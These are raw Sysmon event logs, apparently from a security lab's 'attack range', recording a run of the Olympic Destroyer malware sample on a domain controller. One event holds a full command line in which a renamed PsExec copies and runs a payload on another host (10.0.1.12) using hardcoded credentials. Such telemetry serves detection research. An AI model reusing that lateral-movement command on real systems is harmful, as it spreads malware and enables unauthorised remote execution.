10341000x8000000000000000291773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.367{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F9-6216-C205-000000003802}7136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.345{C8EA50B7-12F9-6216-C205-000000003802}71367056C:\Windows\system32\conhost.exe{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.298{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C205-000000003802}7136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.298{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C205-000000003802}7136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.182{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.166{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000291764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB49F73F16406C2294589C93F9EDEFEF,SHA256=0C446016262021384411DFBB8FAE684E04CE98C2E58303C44935DBC01D808FE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.166{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.168{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.166{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C105-000000003802}6372C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.150{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.150{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.150{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:57.113{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.066{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F8-6216-C005-000000003802}2732C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.066{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F8-6216-C005-000000003802}2732C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.012{C8EA50B7-12F8-6216-C005-000000003802}27327052C:\Windows\system32\conhost.exe{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:58.510{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8E90AE03915754CC022D891EA7E3307,SHA256=6A92542543169C1DD468A3178D1D7EEA59E2D77047242A483A99D2B9C92017F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.331{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC46B2EE476D6B6238646BED080AE73,SHA256=2FD8DB698C9B6B81E88AD57183E004C3F79BAE3E2BC05D21C39D4DCCF7DF7D06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.316{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F8E17B33AC7AACFDD217C6DB8D67A11,SHA256=FBE1FB335CC2E5965D33D8C138A029F793306A411EE785081B0915FFDE01A31F,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.131{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.131{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.131{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:58.115{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.069{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FA-6216-C805-000000003802}836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.069{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FA-6216-C805-000000003802}836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.069{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.069{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.053{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.053{C8EA50B7-12FA-6216-C805-000000003802}8361012C:\Windows\system32\conhost.exe{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:58.046{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.000{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FA-6216-C805-000000003802}836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:58.000{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FA-6216-C805-000000003802}836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:59.572{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A1B4F77FBE03B77A88864F5E62D082,SHA256=B9246D2060F942A188C3D85793DDF3A1481B255E5274E06F36AAE4026BA8E87B,IMPHASH=00000000000000000000000000000000falsetrue 